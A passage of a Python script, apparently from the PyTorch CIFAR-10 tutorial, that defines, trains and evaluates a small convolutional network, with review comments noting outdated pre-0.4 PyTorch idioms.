    restored = img / 2 + 0.5  # invert Normalize((0.5,)*3, (0.5,)*3)
    pixels = restored.numpy()
    # torch stores images channels-first; matplotlib wants (H, W, C).
    plt.imshow(np.transpose(pixels, (1, 2, 0)))
    plt.show()
# get some random training images
dataiter = iter(trainloader)
# Use the next() builtin instead of dataiter.next(): the method form is
# Python-2-only, while next(dataiter) works on both Python 2 and 3.
images, labels = next(dataiter)
# show images
imshow(torchvision.utils.make_grid(images))
# print labels
print(' '.join('%5s' % classes[labels[j]] for j in range(4)))
# 2. DEFINE A CONVOLUTIONAL NEURAL NETWORK
# modifying the NN form the NN section to take 3-channel images instead of 1
from torch.autograd import Variable
import torch.nn as nn
import torch.nn.functional as F
class Net(nn.Module):
    """Small CNN for 3x32x32 CIFAR-10 images: two conv+pool stages
    followed by three fully-connected layers producing 10 class scores."""

    def __init__(self):
        super(Net, self).__init__()
        # 3 input channels -> 6 feature maps, 5x5 kernels.
        self.conv1 = nn.Conv2d(3, 6, 5)
        # One shared 2x2 max-pool, applied after each conv layer.
        self.pool = nn.MaxPool2d(2, 2)
        # 6 -> 16 feature maps, 5x5 kernels.
        self.conv2 = nn.Conv2d(6, 16, 5)
        # After the second pool the feature map is 16 channels of 5x5.
        self.fc1 = nn.Linear(16 * 5 * 5, 120)
        self.fc2 = nn.Linear(120, 84)
        self.fc3 = nn.Linear(84, 10)

    def forward(self, x):
        pooled1 = self.pool(F.relu(self.conv1(x)))
        pooled2 = self.pool(F.relu(self.conv2(pooled1)))
        # Flatten all feature maps into one vector per batch element.
        flat = pooled2.view(-1, 16 * 5 * 5)
        hidden = F.relu(self.fc1(flat))
        hidden = F.relu(self.fc2(hidden))
        # Raw class scores (no softmax); CrossEntropyLoss applies log-softmax.
        return self.fc3(hidden)
net = Net()

# 3. DEFINE A LOSS FUNCTION AND OPTIMIZER
# using classification cross entropy loss & sgd w/ momentum
import torch.optim as optim
criterion = nn.CrossEntropyLoss()
optimizer = optim.SGD(net.parameters(), lr=0.001, momentum=0.9)

# 4. TRAIN THE NETWORK
# loop over the data iterator, and feed the inputs to the network & optimize:
for epoch in range(2):  # loop over datset multipl times
    running_loss = 0.0
    for i, data in enumerate(trainloader, 0):
        # get inputs
        inputs, labels = data
        # wrap them in Variable
        # NOTE(review): Variable is the pre-0.4 PyTorch autograd wrapper;
        # on PyTorch >= 0.4 tensors are Variables and this wrap is a no-op.
        inputs, labels = Variable(inputs), Variable(labels)
        # zero the parameter gradients
        optimizer.zero_grad()
        # forward + backward + optimize
        outputs = net(inputs)
        loss = criterion(outputs, labels)
        loss.backward()
        optimizer.step()
        # print statistics
        # NOTE(review): loss.data[0] is the pre-0.4 idiom; on PyTorch >= 0.4
        # it raises/warns — use loss.item() there.
        running_loss += loss.data[0]
        if i % 2000 == 1999:  # print every 2000 mini-batches
            print('[%d, %5d] loss: %.3f' %
                  (epoch + 1, i + 1, running_loss / 2000))
            running_loss = 0.0
print('Finished Training')
# 5. TEST THE NETWORK ON THE TEST DATA
# checking predicted class label against ground-truth
# displaying an image from the test set:
dataiter = iter(testloader)
# Use the next() builtin instead of dataiter.next(): the method form is
# Python-2-only, while next(dataiter) works on both Python 2 and 3.
images, labels = next(dataiter)
# print images
imshow(torchvision.utils.make_grid(images))
print('GroundTruth: ', ' '.join('%5s' % classes[labels[j]] for j in range(4)))
# now running the network on these:
outputs = net(Variable(images))
# The outputs are energies for the 10 classes. The higher the more the network
# thinks that image is that particular class. Getting index of highest energy:
_, predicted = torch.max(outputs.data, 1)
print('Predicted: ', ' '.join('%5s' % classes[predicted[j]] for j in range(4)))
# Looking at how network performs on the entire dataset:
correct = 0; total = 0
for data in testloader:
    images, labels = data
    outputs = net(Variable(images))
    # torch.max over dim 1 returns (values, indices); the indices are the
    # predicted class ids.
    _, predicted = torch.max(outputs.data, 1)
    total += labels.size(0)
    # NOTE(review): on PyTorch >= 0.4 .sum() returns a 0-dim tensor, so
    # `correct` becomes a tensor; use (predicted == labels).sum().item() there.
    correct += (predicted == labels).sum()
print('Accuracy of the network on the 10000 test images: %d %%' % (
    100 * correct / total))
# Chance is 10%. Viewing the classes the network did well on and not:
class_correct = list(0. for i in range(10))
class_total = list(0. for i in range(10))
for data in testloader:
    images, labels = data
    outputs = net(Variable(images))
    _, predicted = torch.max(outputs.data, 1)
    # Per-element correctness for the batch; squeeze() drops the extra dim
    # so c indexes as a flat vector of booleans.
    c = (predicted == labels).squeeze()
    # NOTE(review): the hard-coded range(4) assumes batch_size=4 and that
    # 10000 % 4 == 0 (true for this testloader); a partial final batch
    # would index out of range.
    for i in range(4):
        label = labels[i]
        class_correct[label] += c[i]
        class_total[label] += 1
for i in range(10):
    print('Accuracy of %5s : %2d %%' % (
        classes[i], 100 * class_correct[i] / class_total[i]))
# TRAINING ON GPU:
# You transfer a Neural Net to the GPU the same way you trsfr a Tensor. This'll
# recursively go over all modules and convert their parameters and buffers to
# CUDA tensors:
net.cuda()
# Remember you'll have to send inputs & targets at every step to the GPU too:
# NOTE(review): `inputs`/`labels` here are leftovers from the last training
# batch; in a real run these .cuda() transfers belong inside the training loop.
inputs, labels = Variable(inputs.cuda()), Variable(labels.cuda())
# the bigger this network (it's v.small r.now) the greater the speedup.
#
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.